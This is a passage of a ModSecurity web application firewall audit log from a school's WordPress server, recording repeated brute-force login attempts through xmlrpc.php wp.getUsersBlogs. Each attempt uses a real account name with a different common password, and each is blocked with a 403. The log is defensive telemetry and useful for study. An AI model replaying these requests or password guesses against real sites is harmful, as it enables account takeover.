sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e9fad01-Z-- --522c7b22-A-- [14/Jun/2025:09:55:10 +0700] aEzkjmmwZ6YUkjOdtI7M9QAAABI 103.236.140.4 43400 103.236.140.4 8181 --522c7b22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --522c7b22-C-- wp.getUsersBlogs kesiswaan 1q2w3e4r5t --522c7b22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --522c7b22-E-- --522c7b22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869710345596 6144 (- - -) Stopwatch2: 1749869710345596 6144; combined=4181, p1=563, p2=3441, p3=0, p4=0, p5=105, sr=101, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --522c7b22-Z-- --c1950614-A-- [14/Jun/2025:09:55:17 +0700] aEzklWmwZ6YUkjOdtI7NAQAAAAU 103.236.140.4 43426 103.236.140.4 8181 --c1950614-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c1950614-C-- wp.getUsersBlogs kesiswaan 1234%^&* --c1950614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1950614-E-- --c1950614-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869717595682 5367 (- - -) Stopwatch2: 1749869717595682 5367; combined=3778, p1=473, p2=3133, p3=0, p4=0, p5=102, sr=97, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1950614-Z-- --91a19649-A-- [14/Jun/2025:09:56:10 +0700] aEzkymIDXuKmWNi2UBS4rQAAAEI 103.236.140.4 43560 103.236.140.4 8181 --91a19649-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --91a19649-C-- wp.getUsersBlogs kesiswaan 212903 --91a19649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91a19649-E-- --91a19649-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (77+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869770135265 4563 (- - -) Stopwatch2: 1749869770135265 4563; combined=3372, p1=343, p2=2836, p3=0, p4=0, p5=109, sr=78, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91a19649-Z-- --4372fc47-A-- [14/Jun/2025:09:57:10 +0700] aEzlBl3g_boun6Rx5jLTQAAAAM8 103.236.140.4 43664 103.236.140.4 8181 --4372fc47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4372fc47-C-- wp.getUsersBlogs kesiswaan joshua --4372fc47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4372fc47-E-- --4372fc47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869830756720 4245 (- - -) Stopwatch2: 1749869830756720 4245; combined=3238, p1=358, p2=2712, p3=0, p4=0, p5=97, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4372fc47-Z-- --c7e5b938-A-- [14/Jun/2025:09:58:10 +0700] aEzlQkMWfhkd5Y0sFtrskQAAAJg 103.236.140.4 43764 103.236.140.4 8181 --c7e5b938-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c7e5b938-C-- wp.getUsersBlogs kesiswaan samsung --c7e5b938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7e5b938-E-- --c7e5b938-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869890009475 4153 (- - -) Stopwatch2: 1749869890009475 4153; combined=3186, p1=345, p2=2656, p3=0, p4=0, p5=116, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7e5b938-Z-- --727c1551-A-- [14/Jun/2025:09:59:10 +0700] aEzlfkMWfhkd5Y0sFtrsvQAAAJU 103.236.140.4 43862 103.236.140.4 8181 --727c1551-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --727c1551-C-- wp.getUsersBlogs kesiswaan ohmnamah23 --727c1551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --727c1551-E-- --727c1551-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869950007675 3927 (- - -) Stopwatch2: 1749869950007675 3927; combined=2911, p1=306, p2=2427, p3=0, p4=0, p5=105, sr=71, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --727c1551-Z-- --76638065-A-- [14/Jun/2025:10:00:14 +0700] aEzlvkMWfhkd5Y0sFtrtCgAAAIM 103.236.140.4 44046 103.236.140.4 8181 --76638065-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --76638065-C-- wp.getUsersBlogs kesiswaan dancer --76638065-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76638065-E-- --76638065-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (85+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870014529814 6104 (- - -) Stopwatch2: 1749870014529814 6104; combined=4207, p1=555, p2=3449, p3=0, p4=0, p5=118, sr=96, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76638065-Z-- --cce23a20-A-- [14/Jun/2025:10:01:14 +0700] aEzl-l3g_boun6Rx5jLTVAAAAMo 103.236.140.4 44236 103.236.140.4 8181 --cce23a20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cce23a20-C-- wp.getUsersBlogs kesiswaan 1234561 --cce23a20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cce23a20-E-- --cce23a20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870074094485 5418 (- - -) Stopwatch2: 1749870074094485 5418; combined=3791, p1=427, p2=3159, p3=0, p4=0, p5=117, sr=89, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cce23a20-Z-- --443e1264-A-- [14/Jun/2025:10:02:14 +0700] aEzmNkMWfhkd5Y0sFtrtTwAAAIA 103.236.140.4 44312 103.236.140.4 8181 --443e1264-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --443e1264-C-- wp.getUsersBlogs timkreatif 123123 --443e1264-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --443e1264-E-- --443e1264-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870134450204 5296 (- - -) Stopwatch2: 1749870134450204 5296; combined=3715, p1=457, p2=3085, p3=0, p4=0, p5=102, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --443e1264-Z-- --e188fb02-A-- [14/Jun/2025:10:03:14 +0700] aEzmckMWfhkd5Y0sFtrtqgAAAJA 103.236.140.4 44512 103.236.140.4 8181 --e188fb02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e188fb02-C-- wp.getUsersBlogs timkreatif #changeme! --e188fb02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e188fb02-E-- --e188fb02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (97+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870194600116 4389 (- - -) Stopwatch2: 1749870194600116 4389; combined=3363, p1=383, p2=2813, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e188fb02-Z-- --7a2b4865-A-- [14/Jun/2025:10:04:14 +0700] aEzmrkMWfhkd5Y0sFtrt6AAAAIs 103.236.140.4 44648 103.236.140.4 8181 --7a2b4865-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7a2b4865-C-- wp.getUsersBlogs timkreatif smkn22-jkt.sch@ --7a2b4865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a2b4865-E-- --7a2b4865-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870254380850 5049 (- - -) Stopwatch2: 1749870254380850 5049; combined=3736, p1=426, p2=3140, p3=0, p4=0, p5=99, sr=77, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a2b4865-Z-- --1b4e5f29-A-- [14/Jun/2025:10:05:17 +0700] aEzm7UMWfhkd5Y0sFtruAgAAAI0 103.236.140.4 44752 103.236.140.4 8181 --1b4e5f29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1b4e5f29-C-- wp.getUsersBlogs timkreatif Marketing --1b4e5f29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b4e5f29-E-- --1b4e5f29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870317323599 4903 (- - -) Stopwatch2: 1749870317323599 4903; combined=3675, p1=379, p2=3127, p3=0, p4=0, p5=99, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b4e5f29-Z-- --ce17ce27-A-- [14/Jun/2025:10:06:18 +0700] aEznKkMWfhkd5Y0sFtruGAAAAIw 103.236.140.4 44808 103.236.140.4 8181 --ce17ce27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce17ce27-C-- wp.getUsersBlogs timkreatif abc --ce17ce27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce17ce27-E-- --ce17ce27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870378073885 5041 (- - -) Stopwatch2: 1749870378073885 5041; combined=3649, p1=472, p2=3004, p3=0, p4=0, p5=102, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce17ce27-Z-- --c4a92142-A-- [14/Jun/2025:10:07:18 +0700] aEznZkMWfhkd5Y0sFtruUwAAAIA 103.236.140.4 44964 103.236.140.4 8181 --c4a92142-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c4a92142-C-- wp.getUsersBlogs timkreatif 123456789a --c4a92142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4a92142-E-- --c4a92142-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (75+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870438089629 4196 (- - -) Stopwatch2: 1749870438089629 4196; combined=3234, p1=346, p2=2724, p3=0, p4=0, p5=95, sr=77, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4a92142-Z-- --b13c9652-A-- [14/Jun/2025:10:08:19 +0700] aEzno0MWfhkd5Y0sFtrudwAAAI8 103.236.140.4 45050 103.236.140.4 8181 --b13c9652-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b13c9652-C-- wp.getUsersBlogs timkreatif admins --b13c9652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b13c9652-E-- --b13c9652-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870499646013 5245 (- - -) Stopwatch2: 1749870499646013 5245; combined=3652, p1=475, p2=3026, p3=0, p4=0, p5=90, sr=105, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b13c9652-Z-- --44bca62b-A-- [14/Jun/2025:10:09:31 +0700] aEzn60MWfhkd5Y0sFtrukwAAAJg 103.236.140.4 45120 103.236.140.4 8181 --44bca62b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --44bca62b-C-- wp.getUsersBlogs timkreatif 1qaz@wsx --44bca62b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44bca62b-E-- --44bca62b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified 